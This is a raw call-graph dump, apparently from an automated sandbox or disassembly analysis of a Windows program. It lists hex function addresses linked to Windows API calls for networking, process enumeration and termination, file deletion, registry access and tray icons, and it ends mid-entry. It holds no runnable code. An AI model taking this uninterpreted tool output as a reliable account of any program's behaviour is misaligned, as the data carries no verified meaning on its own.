96714->96715 96716 38be67 96715->96716 96760 38bfa5 39 API calls 96715->96760 96716->96683 96718->96683 96719->96683 96720->96683 96722 3a014b 8 API calls 96721->96722 96723 39bc65 96722->96723 96724 38b329 8 API calls 96723->96724 96725 39bc70 96724->96725 96725->96683 96726->96683 96727->96683 96728->96683 96729->96683 96730->96669 96731->96682 96732->96683 96733->96683 96734->96683 96736 38befc __fread_nolock 96735->96736 96737 38beed 96735->96737 96736->96683 96737->96736 96738 3a017b 8 API calls 96737->96738 96738->96736 96739->96682 96740->96674 96743 391e6d messages 96741->96743 96742 392512 96745 391ff7 messages 96742->96745 96759 39be08 39 API calls 96742->96759 96743->96742 96743->96745 96747 3d7837 96743->96747 96750 3d766b 96743->96750 96757 39e322 8 API calls messages 96743->96757 96745->96705 96747->96745 96758 3ad2d5 39 API calls 96747->96758 96756 3ad2d5 39 API calls 96750->96756 96751->96705 96752->96699 96753->96709 96754->96709 96755->96709 96756->96750 96757->96743 96758->96745 96759->96745 96760->96716 96761 38dd3d 96762 38dd63 96761->96762 96763 3d19c2 96761->96763 96764 38dead 96762->96764 96766 3a014b 8 API calls 96762->96766 96765 3d1a82 96763->96765 96769 3d1a26 96763->96769 96774 3d1a46 96763->96774 96770 3a017b 8 API calls 96764->96770 96821 3f3fe1 81 API calls __wsopen_s 96765->96821 96773 38dd8d 96766->96773 96819 39e6e8 207 API calls 96769->96819 96780 38dee4 __fread_nolock 96770->96780 96771 3d1a7d 96775 3a014b 8 API calls 96773->96775 96773->96780 96774->96771 96820 3f3fe1 81 API calls __wsopen_s 96774->96820 96777 38dddb 96775->96777 96776 3a017b 8 API calls 96776->96780 96777->96769 96778 38de16 96777->96778 96779 390340 207 API calls 96778->96779 96781 38de29 96779->96781 96780->96774 96780->96776 96781->96771 96781->96780 96782 3d1aa5 96781->96782 96783 38de77 96781->96783 96785 38d526 96781->96785 96822 3f3fe1 81 API calls __wsopen_s 96782->96822 96783->96764 96783->96785 96786 3a014b 8 API calls 96785->96786 96787 38d589 96786->96787 96803 38c32d 96787->96803 96790 3a014b 8 API calls 96795 38d66e messages 96790->96795 96794 3d1f79 96824 3e56ae 8 API calls messages 96794->96824 96795->96794 96797 3d1f94 96795->96797 96798 38bed9 8 API calls 96795->96798 96799 38c3ab 8 API calls 96795->96799 96800 38d911 messages 96795->96800 96823 38b4c8 8 API calls 96795->96823 96798->96795 96799->96795 96801 38d9ac messages 96800->96801 96810 38c3ab 96800->96810 96802 38d9c3 96801->96802 96818 39e30a 8 API calls messages 96801->96818 96807 38c33d 96803->96807 96804 38c345 96804->96790 96805 3a014b 8 API calls 96805->96807 96806 38bf73 8 API calls 96806->96807 96807->96804 96807->96805 96807->96806 96808 38bed9 8 API calls 96807->96808 96809 38c32d 8 API calls 96807->96809 96808->96807 96809->96807 96811 38c3b9 96810->96811 96817 38c3e1 messages 96810->96817 96812 38c3c7 96811->96812 96813 38c3ab 8 API calls 96811->96813 96814 38c3cd 96812->96814 96815 38c3ab 8 API calls 96812->96815 96813->96812 96814->96817 96825 38c7e0 8 API calls messages 96814->96825 96815->96814 96817->96801 96818->96801 96819->96774 96820->96771 96821->96771 96822->96771 96823->96795 96824->96797 96825->96817 96826 39235c 96837 392365 __fread_nolock 96826->96837 96828 3d74e3 96861 3e13c8 8 API calls __fread_nolock 96828->96861 96830 3d74ef 96834 38bed9 8 API calls 96830->96834 96835 391ff7 __fread_nolock 96830->96835 96831 3923b6 96833 387d74 8 API calls 96831->96833 96832 3a014b 8 API calls 96832->96837 96833->96835 96834->96835 96836 3a017b 8 API calls 96836->96837 96837->96828 96837->96831 96837->96832 96837->96835 96837->96836 96838 388ec0 96837->96838 96839 388ed5 96838->96839 96855 388ed2 96838->96855 96840 388f0b 96839->96840 96841 388edd 96839->96841 96843 388f1d 96840->96843 96850 3c6b1f 96840->96850 96852 3c6a38 96840->96852 96862 3a5536 26 API calls 96841->96862 96863 39fe6f 51 API calls 96843->96863 96846 388eed 96849 3a014b 8 API calls 96846->96849 96847 3c6b37 96847->96847 96851 388ef7 96849->96851 96865 3a54f3 26 API calls 96850->96865 96853 38b329 8 API calls 96851->96853 96854 3a017b 8 API calls 96852->96854 96860 3c6ab1 96852->96860 96853->96855 96857 3c6a81 96854->96857 96855->96837 96856 3a014b 8 API calls 96858 3c6aa8 96856->96858 96857->96856 96859 38b329 8 API calls 96858->96859 96859->96860 96864 39fe6f 51 API calls 96860->96864 96861->96830 96862->96846 96863->96846 96864->96850 96865->96847 96866 390ebf 96867 390ed3 96866->96867 96873 391425 96866->96873 96868 3a014b 8 API calls 96867->96868 96871 390ee5 96867->96871 96868->96871 96869 3d562c 96961 3f1b14 8 API calls 96869->96961 96871->96869 96872 390f3e 96871->96872 96960 38b4c8 8 API calls 96871->96960 96892 39049d messages 96872->96892 96899 392b20 96872->96899 96873->96871 96876 38bed9 8 API calls 96873->96876 96876->96871 96877 3d632b 96965 3f3fe1 81 API calls __wsopen_s 96877->96965 96878 391e50 40 API calls 96898 390376 messages 96878->96898 96879 391695 96884 38bed9 8 API calls 96879->96884 96879->96892 96880 3a014b 8 API calls 96880->96898 96882 3d625a 96964 3f3fe1 81 API calls __wsopen_s 96882->96964 96883 3d5cdb 96887 38bed9 8 API calls 96883->96887 96883->96892 96884->96892 96887->96892 96888 38bed9 8 API calls 96888->96898 96889 3a05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96889->96898 96891 38bf73 8 API calls 96891->96898 96893 3d6115 96962 3f3fe1 81 API calls __wsopen_s 96893->96962 96894 3a0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96894->96898 96896 3a0413 29 API calls pre_c_initialization 96896->96898 96897 390aae messages 96963 3f3fe1 81 API calls __wsopen_s 96897->96963 96898->96877 96898->96878 96898->96879 96898->96880 96898->96882 96898->96883 96898->96888 96898->96889 96898->96891 96898->96892 96898->96893 96898->96894 96898->96896 96898->96897 96959 391990 207 API calls 2 library calls 96898->96959 96900 392fc0 96899->96900 96901 392b86 96899->96901 97098 3a05b2 5 API calls __Init_thread_wait 96900->97098 96903 3d7bd8 96901->96903 96904 392ba0 96901->96904 97061 407af9 96903->97061 96966 393160 96904->96966 96906 392fca 96910 38b329 8 API calls 96906->96910 96915 39300b 96906->96915 96908 3d7be4 96908->96898 96920 392fe4 96910->96920 96911 393160 9 API calls 96912 392bc6 96911->96912 96914 392bfc 96912->96914 96912->96915 96913 3d7bed 96913->96898 96916 3d7bfd 96914->96916 96939 392c18 __fread_nolock 96914->96939 96915->96913 97100 38b4c8 8 API calls 96915->97100 97103 3f3fe1 81 API calls __wsopen_s 96916->97103 96919 393049 97101 39e6e8 207 API calls 96919->97101 97099 3a0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96920->97099 96922 3d7c15 97104 3f3fe1 81 API calls __wsopen_s 96922->97104 96924 392d3f 96926 3d7c78 96924->96926 96927 392d4c 96924->96927 97106 4061a2 53 API calls _wcslen 96926->97106 96928 393160 9 API calls 96927->96928 96930 392d59 96928->96930 96933 3d7da1 96930->96933 96936 393160 9 API calls 96930->96936 96931 3a014b 8 API calls 96931->96939 96932 3a017b 8 API calls 96932->96939 96943 3d7c10 96933->96943 97107 3f3fe1 81 API calls __wsopen_s 96933->97107 96934 393082 97102 39fe39 8 API calls 96934->97102 96941 392d73 96936->96941 96938 390340 207 API calls 96938->96939 96939->96919 96939->96922 96939->96924 96939->96931 96939->96932 96939->96938 96940 3d7c59 96939->96940 96939->96943 97105 3f3fe1 81 API calls __wsopen_s 96940->97105 96941->96933 96944 38bed9 8 API calls 96941->96944 96946 392dd7 messages 96941->96946 96943->96898 96944->96946 96945 393160 9 API calls 96945->96946 96946->96933 96946->96934 96946->96943 96946->96945 96948 392e8b messages 96946->96948 96976 409fe8 96946->96976 96979 40a9ac 96946->96979 96987 3f664c 96946->96987 96994 40a5b2 96946->96994 97000 40ad47 96946->97000 97005 3ff94a 96946->97005 97014 39ac3e 96946->97014 97033 409ffc 96946->97033 97036 400fb8 96946->97036 96947 392f2d 96947->96898 96948->96947 97097 39e322 8 API calls messages 96948->97097 96959->96898 96960->96871 96961->96892 96962->96897 96963->96892 96964->96892 96965->96892 96967 39317d 96966->96967 96968 3931a1 96966->96968 96975 392bb0 96967->96975 97110 3a05b2 5 API calls __Init_thread_wait 96967->97110 97108 3a05b2 5 API calls __Init_thread_wait 96968->97108 96971 3931ab 96971->96967 97109 3a0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96971->97109 96972 399f47 96972->96975 97111 3a0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96972->97111 96975->96911 97112 4089b6 96976->97112 96978 409ff8 96978->96946 96981 40aa08 96979->96981 96986 40a9c8 96979->96986 96980 40aa26 96984 40aa8e 96980->96984 96980->96986 97271 38c98d 39 API calls 96980->97271 96981->96980 97270 38c98d 39 API calls 96981->97270 97238 3f0372 96984->97238 96986->96946 96988 388ec0 52 API calls 96987->96988 96989 3f6662 96988->96989 97312 3edc54 96989->97312 96991 3f666a 96992 3f666e GetLastError 96991->96992 96993 3f6683 96991->96993 96992->96993 96993->96946 96996 40a5c5 96994->96996 96995 388ec0 52 API calls 96997 40a632 96995->96997 96996->96995 96999 40a5d4 96996->96999 97404 3f18a9 96997->97404 96999->96946 97001 388ec0 52 API calls 97000->97001 97002 40ad63 97001->97002 97445 3edd87 CreateToolhelp32Snapshot Process32FirstW 97002->97445 97004 40ad72 97004->96946 97006 3a017b 8 API calls 97005->97006 97007 3ff95b 97006->97007 97008 38423c 8 API calls 97007->97008 97009 3ff965 97008->97009 97010 388ec0 52 API calls 97009->97010 97011 3ff97c GetEnvironmentVariableW 97010->97011 97464 3f160f 8 API calls 97011->97464 97013 3ff999 messages 97013->96946 97015 388ec0 52 API calls 97014->97015 97016 39ac68 97015->97016 97017 39bc58 8 API calls 97016->97017 97018 39ac7f 97017->97018 97029 39b09b _wcslen 97018->97029 97479 38c98d 39 API calls 97018->97479 97020 3a4d98 40 API calls 97020->97029 97022 39bbbe 43 API calls 97022->97029 97024 386c03 8 API calls 97024->97029 97026 39b1fb 97026->96946 97027 388ec0 52 API calls 97027->97029 97028 38c98d 39 API calls 97028->97029 97029->97020 97029->97022 97029->97024 97029->97026 97029->97027 97029->97028 97030 388577 8 API calls 97029->97030 97465 38396b 97029->97465 97475 383907 97029->97475 97480 387ad5 97029->97480 97485 38ad40 8 API calls __fread_nolock 97029->97485 97486 387b1a 8 API calls 97029->97486 97030->97029 97034 4089b6 119 API calls 97033->97034 97035 40a00c 97034->97035 97035->96946 97037 400fe1 97036->97037 97038 40100f WSAStartup 97037->97038 97537 38c98d 39 API calls 97037->97537 97040 401054 97038->97040 97060 401023 messages 97038->97060 97524 39c1f6 97040->97524 97042 400ffc 97042->97038 97538 38c98d 39 API calls 97042->97538 97044 388ec0 52 API calls 97046 401069 97044->97046 97529 39f9d4 WideCharToMultiByte 97046->97529 97047 40100b 97047->97038 97049 401075 inet_addr gethostbyname 97050 401093 IcmpCreateFile 97049->97050 97049->97060 97051 4010d3 97050->97051 97050->97060 97052 3a017b 8 API calls 97051->97052 97053 4010ec 97052->97053 97054 38423c 8 API calls 97053->97054 97055 4010f7 97054->97055 97056 401102 IcmpSendEcho 97055->97056 97057 40112b IcmpSendEcho 97055->97057 97058 40114c 97056->97058 97057->97058 97059 401212 IcmpCloseHandle WSACleanup 97058->97059 97059->97060 97060->96946 97062 407b52 97061->97062 97063 407b38 97061->97063 97541 4060e6 97062->97541 97552 3f3fe1 81 API calls __wsopen_s 97063->97552 97067 390340 206 API calls 97068 407bc1 97067->97068 97069 407c5c 97068->97069 97073 407c03 97068->97073 97083 407b4a 97068->97083 97070 407cb0 97069->97070 97071 407c62 97069->97071 97072 388ec0 52 API calls 97070->97072 97070->97083 97553 3f1ad8 8 API calls 97071->97553 97074 407cc2 97072->97074 97076 3f148b 8 API calls 97073->97076 97077 38c2c9 8 API calls 97074->97077 97079 407c3b 97076->97079 97080 407ce6 CharUpperBuffW 97077->97080 97078 407c85 97554 38bd07 8 API calls 97078->97554 97082 392b20 206 API calls 97079->97082 97084 407d00 97080->97084 97082->97083 97083->96908 97085 407d53 97084->97085 97086 407d07 97084->97086 97087 388ec0 52 API calls 97085->97087 97548 3f148b 97086->97548 97088 407d5b 97087->97088 97555 39aa65 9 API calls 97088->97555 97092 392b20 206 API calls 97092->97083 97093 407d65 97093->97083 97094 388ec0 52 API calls 97093->97094 97095 407d80 97094->97095 97556 38bd07 8 API calls 97095->97556 97097->96948 97098->96906 97099->96915 97100->96919 97101->96934 97102->96934 97103->96943 97104->96943 97105->96943 97106->96941 97107->96943 97108->96971 97109->96967 97110->96972 97111->96975 97113 388ec0 52 API calls 97112->97113 97114 4089ed 97113->97114 97137 408a32 messages 97114->97137 97150 409730 97114->97150 97116 408cde 97117 408eac 97116->97117 97122 408cec 97116->97122 97200 409941 59 API calls 97117->97200 97120 408ebb 97121 408ec7 97120->97121 97120->97122 97121->97137 97163 4088e3 97122->97163 97123 388ec0 52 API calls 97139 408aa6 97123->97139 97128 408d25 97177 39ffe0 97128->97177 97131 408d45 97184 3f3fe1 81 API calls __wsopen_s 97131->97184 97132 408d5f 97185 387e12 97132->97185 97135 408d50 GetCurrentProcess TerminateProcess 97135->97132 97137->96978 97139->97116 97139->97123 97139->97137 97182 3e4ad3 8 API calls __fread_nolock 97139->97182 97183 408f7a 41 API calls 97139->97183 97142 408f22 97142->97137 97146 408f36 FreeLibrary 97142->97146 97143 408d9e 97197 4095d8 74 API calls 97143->97197 97146->97137 97148 408daf 97148->97142 97198 391ca0 8 API calls 97148->97198 97199 38b4c8 8 API calls 97148->97199 97201 4095d8 74 API calls 97148->97201 97151 38c2c9 8 API calls 97150->97151 97152 40974b CharLowerBuffW 97151->97152 97202 3e9805 97152->97202 97156 38bf73 8 API calls 97157 409787 97156->97157 97209 38acc0 97157->97209 97159 40979b 97160 38adf4 8 API calls 97159->97160 97162 4097a5 _wcslen 97160->97162 97161 4098bb _wcslen 97161->97139 97162->97161 97221 408f7a 41 API calls 97162->97221 97164 408949 97163->97164 97165 4088fe 97163->97165 97169 409af3 97164->97169 97166 3a017b 8 API calls 97165->97166 97167 408920 97166->97167 97167->97164 97168 3a014b 8 API calls 97167->97168 97168->97167 97170 409d08 messages 97169->97170 97174 409b17 _strcat _wcslen ___std_exception_copy 97169->97174 97170->97128 97171 38c63f 39 API calls 97171->97174 97172 38c98d 39 API calls 97172->97174 97173 38ca5b 39 API calls 97173->97174 97174->97170 97174->97171 97174->97172 97174->97173 97175 388ec0 52 API calls 97174->97175 97225 3ef8c5 10 API calls _wcslen 97174->97225 97175->97174 97179 39fff5 97177->97179 97178 3a008d Sleep 97181 3a005b 97178->97181 97179->97178 97180 3a007b CloseHandle 97179->97180 97179->97181 97180->97181 97181->97131 97181->97132 97182->97139 97183->97139 97184->97135 97186 387e1a 97185->97186 97187 3a014b 8 API calls 97186->97187 97188 387e28 97187->97188 97226 388445 97188->97226 97191 388470 97229 38c760 97191->97229 97193 388480 97194 3a017b 8 API calls 97193->97194 97195 38851c 97193->97195 97194->97195 97195->97148 97196 391ca0 8 API calls 97195->97196 97196->97143 97197->97148 97198->97148 97199->97148 97200->97120 97201->97148 97203 3e9825 _wcslen 97202->97203 97206 3e985a 97203->97206 97207 3e9919 97203->97207 97208 3e9914 97203->97208 97206->97208 97222 39e36b 41 API calls 97206->97222 97207->97208 97223 39e36b 41 API calls 97207->97223 97208->97156 97208->97162 97210 38accf 97209->97210 97212 38ace1 97209->97212 97211 38c2c9 8 API calls 97210->97211 97218 38acda __fread_nolock 97210->97218 97213 3d05a3 __fread_nolock 97211->97213 97212->97210 97214 3d0557 97212->97214 97215 38ad07 97212->97215 97217 3a014b 8 API calls 97214->97217 97224 3888e8 8 API calls 97215->97224 97219 3d0561 97217->97219 97218->97159 97220 3a017b 8 API calls 97219->97220 97220->97210 97221->97161 97222->97206 97223->97207 97224->97218 97225->97174 97227 3a014b 8 API calls 97226->97227 97228 387e30 97227->97228 97228->97191 97230 38c76b 97229->97230 97231 3d1285 97230->97231 97235 38c773 messages 97230->97235 97232 3a014b 8 API calls 97231->97232 97234 3d1291 97232->97234 97233 38c77a 97233->97193 97235->97233 97237 38c7e0 8 API calls messages 97235->97237 97237->97235 97272 3f02aa 97238->97272 97241 3f040b 97243 3f0471 97241->97243 97247 3f041b 97241->97247 97242 3f03f3 97288 3f05e9 56 API calls __fread_nolock 97242->97288 97245 3f0507 97243->97245 97246 3f04a1 97243->97246 97263 3f0399 __fread_nolock 97243->97263 97250 3f05b0 97245->97250 97251 3f0510 97245->97251 97248 3f04a6 97246->97248 97249 3f04d1 97246->97249 97252 3f0453 97247->97252 97289 3f2855 10 API calls 97247->97289 97248->97263 97292 38ca5b 39 API calls 97248->97292 97249->97263 97293 38ca5b 39 API calls 97249->97293 97250->97263 97297 38c63f 39 API calls 97250->97297 97253 3f058d 97251->97253 97254 3f0515 97251->97254 97279 3f1844 97252->97279 97253->97263 97296 38c63f 39 API calls 97253->97296 97258 3f051b 97254->97258 97259 3f0554 97254->97259 97258->97263 97294 38c63f 39 API calls 97258->97294 97259->97263 97295 38c63f 39 API calls 97259->97295 97263->96986 97265 3f0427 97290 3f2855 10 API calls 97265->97290 97268 3f043e __fread_nolock 97291 3f2855 10 API calls 97268->97291 97270->96980 97271->96984 97273 3f02f7 97272->97273 97275 3f02bb 97272->97275 97308 38c98d 39 API calls 97273->97308 97276 3f02f5 97275->97276 97277 388ec0 52 API calls 97275->97277 97298 3a4d98 97275->97298 97276->97241 97276->97242 97276->97263 97277->97275 97280 3f184f 97279->97280 97281 3a014b 8 API calls 97280->97281 97282 3f1856 97281->97282 97283 3f1883 97282->97283 97284 3f1862 97282->97284 97286 3a017b 8 API calls 97283->97286 97285 3a017b 8 API calls 97284->97285 97287 3f186b ___scrt_fastfail 97285->97287 97286->97287 97287->97263 97288->97263 97289->97265 97290->97268 97291->97252 97292->97263 97293->97263 97294->97263 97295->97263 97296->97263 97297->97263 97299 3a4e1b 97298->97299 97300 3a4da6 97298->97300 97311 3a4e2d 40 API calls 2 library calls 97299->97311 97307 3a4dcb 97300->97307 97309 3af649 20 API calls _abort 97300->97309 97303 3a4e28 97303->97275 97304 3a4db2 97310 3b2b5c 26 API calls _strftime 97304->97310 97306 3a4dbd 97306->97275 97307->97275 97308->97276 97309->97304 97310->97306 97311->97303 97313 38bf73 8 API calls 97312->97313 97314 3edc73 97313->97314 97315 38bf73 8 API calls 97314->97315 97316 3edc7c 97315->97316 97317 38bf73 8 API calls 97316->97317 97318 3edc85 97317->97318 97319 385851 9 API calls 97318->97319 97320 3edc90 97319->97320 97336 3eeab0 GetFileAttributesW 97320->97336 97323 3edcab 97338 38568e 97323->97338 97325 386b7c 8 API calls 97325->97323 97326 3edcbf FindFirstFileW 97327 3edd4b FindClose 97326->97327 97330 3edcde 97326->97330 97332 3edd56 97327->97332 97328 3edd26 FindNextFileW 97328->97330 97329 38bed9 8 API calls 97329->97330 97330->97327 97330->97328 97330->97329 97333 386b7c 8 API calls 97330->97333 97380 387bb5 97330->97380 97332->96991 97334 3edd17 DeleteFileW 97333->97334 97334->97328 97335 3edd42 FindClose 97334->97335 97335->97332 97337 3edc99 97336->97337 97337->97323 97337->97325 97339 38bf73 8 API calls 97338->97339 97340 3856a4 97339->97340 97341 38bf73 8 API calls 97340->97341 97342 3856ac 97341->97342 97343 38bf73 8 API calls 97342->97343 97344 3856b4 97343->97344 97345 38bf73 8 API calls 97344->97345 97346 3856bc 97345->97346 97347 3856f0 97346->97347 97348 3c4da1 97346->97348 97350 38acc0 8 API calls 97347->97350 97349 38bed9 8 API calls 97348->97349 97351 3c4daa 97349->97351 97352 3856fe 97350->97352 97353 38bd57 8 API calls 97351->97353 97354 38adf4 8 API calls 97352->97354 97356 385733 97353->97356 97355 385708 97354->97355 97355->97356 97357 38acc0 8 API calls 97355->97357 97358 385754 97356->97358 97364 3c4dcc 97356->97364 97372 385778 97356->97372 97360 385729 97357->97360 97358->97372 97389 38655e 97358->97389 97359 38acc0 8 API calls 97361 385789 97359->97361 97362 38adf4 8 API calls 97360->97362 97365 38579f 97361->97365 97369 38bed9 8 API calls 97361->97369 97362->97356 97368 388577 8 API calls 97364->97368 97366 3857b3 97365->97366 97370 38bed9 8 API calls 97365->97370 97373 38bed9 8 API calls 97366->97373 97374 3857be 97366->97374 97377 3c4e8c 97368->97377 97369->97365 97370->97366 97371 38acc0 8 API calls 97371->97372 97372->97359 97373->97374 97375 38bed9 8 API calls 97374->97375 97379 3857c9 97374->97379 97375->97379 97376 38655e 8 API calls 97376->97377 97377->97372 97377->97376 97392 38ad40 8 API calls __fread_nolock 97377->97392 97379->97326 97381 3c641d 97380->97381 97382 387bc7 97380->97382 97403 3e13c8 8 API calls __fread_nolock 97381->97403 97393 387bd8 97382->97393 97385 387bd3 97385->97330 97386 3c6427 97387 3c6433 97386->97387 97388 38bed9 8 API calls 97386->97388 97388->97387 97390 38c2c9 8 API calls 97389->97390 97391 385761 97390->97391 97391->97371 97391->97372 97392->97377 97394 387c1b __fread_nolock 97393->97394 97395 387be7 97393->97395 97394->97385 97395->97394 97396 3c644e 97395->97396 97397 387c0e 97395->97397 97398 3a014b 8 API calls 97396->97398 97399 387d74 8 API calls 97397->97399 97400 3c645d 97398->97400 97399->97394 97401 3a017b 8 API calls 97400->97401 97402 3c6491 __fread_nolock 97401->97402 97403->97386 97405 3f18b6 97404->97405 97406 3a014b 8 API calls 97405->97406 97407 3f18bd 97406->97407 97410 3efcb5 97407->97410 97409 3f18f7 97409->96999 97411 38c2c9 8 API calls 97410->97411 97412 3efcc8 CharLowerBuffW 97411->97412 97414 3efcdb 97412->97414 97413 38655e 8 API calls 97413->97414 97414->97413 97415 3efd19 97414->97415 97427 3efce5 ___scrt_fastfail 97414->97427 97416 3efd2b 97415->97416 97418 38655e 8 API calls 97415->97418 97417 3a017b 8 API calls 97416->97417 97421 3efd59 97417->97421 97418->97416 97423 3efd7b 97421->97423 97443 3efbed 8 API calls 97421->97443 97422 3efdb8 97424 3a014b 8 API calls 97422->97424 97422->97427 97428 3efe0c 97423->97428 97425 3efdd2 97424->97425 97426 3a017b 8 API calls 97425->97426 97426->97427 97427->97409 97429 38bf73 8 API calls 97428->97429 97430 3efe3e 97429->97430 97431 38bf73 8 API calls 97430->97431 97432 3efe47 97431->97432 97433 38bf73 8 API calls 97432->97433 97441 3efe50 97433->97441 97434 388577 8 API calls 97434->97441 97435 3f0114 97435->97422 97436 38ad40 8 API calls 97436->97441 97437 3a66f8 GetStringTypeW 97437->97441 97439 3a6641 39 API calls 97439->97441 97440 3efe0c 40 API calls 97440->97441 97441->97434 97441->97435 97441->97436 97441->97437 97441->97439 97441->97440 97442 38bed9 8 API calls 97441->97442 97444 3a6722 GetStringTypeW 97441->97444 97442->97441 97443->97421 97444->97441 97455 3ee80e 97445->97455 97447 3ede86 CloseHandle 97447->97004 97448 3eddd4 Process32NextW 97448->97447 97454 3eddcd 97448->97454 97449 38bf73 8 API calls 97449->97454 97450 38b329 8 API calls 97450->97454 97451 38568e 8 API calls 97451->97454 97452 387bb5 8 API calls 97452->97454 97454->97447 97454->97448 97454->97449 97454->97450 97454->97451 97454->97452 97461 39e36b 41 API calls 97454->97461 97456 3ee819 97455->97456 97457 3ee830 97456->97457 97460 3ee836 97456->97460 97462 3a6722 GetStringTypeW 97456->97462 97463 3a666b 39 API calls 97457->97463 97460->97454 97461->97454 97462->97456 97463->97460 97464->97013 97466 383996 ___scrt_fastfail 97465->97466 97487 385f32 97466->97487 97469 383a1c 97471 3c40cd Shell_NotifyIconW 97469->97471 97472 383a3a Shell_NotifyIconW 97469->97472 97491 3861a9 97472->97491 97474 383a50 97474->97029 97476 383969 97475->97476 97477 383919 ___scrt_fastfail 97475->97477 97476->97029 97478 383938 Shell_NotifyIconW 97477->97478 97478->97476 97479->97029 97481 3a017b 8 API calls 97480->97481 97482 387afa 97481->97482 97483 3a014b 8 API calls 97482->97483 97484 387b08 97483->97484 97484->97029 97485->97029 97486->97029 97488 3839eb 97487->97488 97489 385f4e 97487->97489 97488->97469 97521 3ed11f 42 API calls 97488->97521 97489->97488 97490 3c5070 DestroyIcon 97489->97490 97490->97488 97492 3861c6 97491->97492 97511 3862a8 97491->97511 97493 387ad5 8 API calls 97492->97493 97494 3861d4 97493->97494 97495 3c5278 LoadStringW 97494->97495 97496 3861e1 97494->97496 97499 3c5292 97495->97499 97497 388577 8 API calls 97496->97497 97498 3861f6 97497->97498 97500 3c52ae 97498->97500 97501 386203 97498->97501 97503 38bed9 8 API calls 97499->97503 97507 386229 ___scrt_fastfail 97499->97507 97500->97507 97508 3c52f1 97500->97508 97510 38bf73 8 API calls 97500->97510 97501->97499 97502 38620d 97501->97502 97504 386b7c 8 API calls 97502->97504 97503->97507 97505 38621b 97504->97505 97506 387bb5 8 API calls 97505->97506 97506->97507 97509 38628e Shell_NotifyIconW 97507->97509 97523 39fe6f 51 API calls 97508->97523 97509->97511 97512 3c52d8 97510->97512 97511->97474 97522 3ea350 9 API calls 97512->97522 97515 3c52e3 97517 387bb5 8 API calls 97515->97517 97516 3c5310 97518 386b7c 8 API calls 97516->97518 97517->97508 97519 3c5321 97518->97519 97520 386b7c 8 API calls 97519->97520 97520->97507 97521->97469 97522->97515 97523->97516 97525 3a017b 8 API calls 97524->97525 97526 39c209 97525->97526 97527 3a014b 8 API calls 97526->97527 97528 39c215 97527->97528 97528->97044 97530 39f9fe 97529->97530 97531 39fa35 97529->97531 97532 3a017b 8 API calls 97530->97532 97540 39fe8a 8 API calls 97531->97540 97534 39fa05 WideCharToMultiByte 97532->97534 97539 39fa3e 8 API calls __fread_nolock 97534->97539 97536 39fa29 97536->97049 97537->97042 97538->97047 97539->97536 97540->97536 97542 406101 97541->97542 97547 40614f 97541->97547 97543 3a017b 8 API calls 97542->97543 97544 406123 97543->97544 97545 3a014b 8 API calls 97544->97545 97544->97547 97557 3f1400 8 API calls 97544->97557 97545->97544 97547->97067 97549 3f14d2 97548->97549 97550 3f1499 97548->97550 97549->97092 97550->97549 97551 3a014b 8 API calls 97550->97551 97551->97549 97552->97083 97553->97078 97554->97083 97555->97093 97556->97083 97557->97544 97558 381033 97563 3868b4 97558->97563 97562 381042 97564 38bf73 8 API calls 97563->97564 97565 386922 97564->97565 97571 38589f 97565->97571 97568 3869bf 97569 381038 97568->97569 97574 386b14 8 API calls __fread_nolock 97568->97574 97570 3a0413 29 API calls __onexit 97569->97570 97570->97562 97575 3858cb 97571->97575 97574->97568 97576 3858d8 97575->97576 97578 3858be 97575->97578 97577 3858df RegOpenKeyExW 97576->97577 97576->97578 97577->97578 97579 3858f9 RegQueryValueExW 97577->97579 97578->97568 97580 38591a 97579->97580 97581 38592f RegCloseKey 97579->97581 97580->97581 97581->97578 97582 3d5650 97591 39e3d5 97582->97591 97584 3d5666 97586 3d56e1 97584->97586 97600 39aa65 9 API calls 97584->97600 97590 3d61d7 97586->97590 97602 3f3fe1 81 API calls __wsopen_s 97586->97602 97588 3d56c1 97588->97586 97601 3f247e 8 API calls 97588->97601 97592 39e3e3 97591->97592 97593 39e3f6 97591->97593 97603 38b4c8 8 API calls 97592->97603 97595 39e429 97593->97595 97596 39e3fb 97593->97596 97604 38b4c8 8 API calls 97595->97604 97598 3a014b 8 API calls 97596->97598 97599 39e3ed 97598->97599 97599->97584 97600->97588 97601->97586 97602->97590 97603->97599 97604->97599 97605 3836f5 97608 38370f 97605->97608 97609 383726 97608->97609 97610 38378a 97609->97610 97611 38372b 97609->97611 97649 383788 97609->97649 97613 3c3df4 97610->97613 97614 383790 97610->97614 97615 383738 97611->97615 97616 383804 PostQuitMessage 97611->97616 97612 38376f DefWindowProcW 97638 383709 97612->97638 97663 382f92 10 API calls 97613->97663 97617 3837bc SetTimer RegisterWindowMessageW 97614->97617 97618 383797 97614->97618 97619 383743 97615->97619 97620 3c3e61 97615->97620 97616->97638 97624 3837e5 CreatePopupMenu 97617->97624 97617->97638 97622 3837a0 KillTimer 97618->97622 97623 3c3d95 97618->97623 97625 38374d 97619->97625 97626 38380e 97619->97626 97666 3ec8f7 65 API calls ___scrt_fastfail 97620->97666 97633 383907 Shell_NotifyIconW 97622->97633 97631 3c3d9a 97623->97631 97632 3c3dd0 MoveWindow 97623->97632 97624->97638 97634 383758 97625->97634 97635 3c3e46 97625->97635 97653 39fcad 97626->97653 97628 3c3e15 97664 39f23c 40 API calls 97628->97664 97639 3c3dbf SetFocus 97631->97639 97640 3c3da0 97631->97640 97632->97638 97641 3837b3 97633->97641 97637 383763 97634->97637 97642 3837f2 97634->97642 97635->97612 97665 3e1423 8 API calls 97635->97665 97636 3c3e73 97636->97612 97636->97638 97637->97612 97650 383907 Shell_NotifyIconW 97637->97650 97639->97638 97640->97637 97643 3c3da9 97640->97643 97660 3859ff DeleteObject DestroyWindow 97641->97660 97661 38381f 75 API calls ___scrt_fastfail 97642->97661 97662 382f92 10 API calls 97643->97662 97647 383802 97647->97638 97649->97612 97651 3c3e3a 97650->97651 97652 38396b 60 API calls 97651->97652 97652->97649 97654 39fd4b 97653->97654 97655 39fcc5 ___scrt_fastfail 97653->97655 97654->97638 97656 3861a9 55 API calls 97655->97656 97658 39fcec 97656->97658 97657 39fd34 KillTimer SetTimer 97657->97654 97658->97657 97659 3dfe2b Shell_NotifyIconW 97658->97659 97659->97657 97660->97638 97661->97647 97662->97638 97663->97628 97664->97637 97665->97649 97666->97636 97667 3a076b 97668 3a0777 ___DestructExceptionObject 97667->97668 97697 3a0221 97668->97697 97670 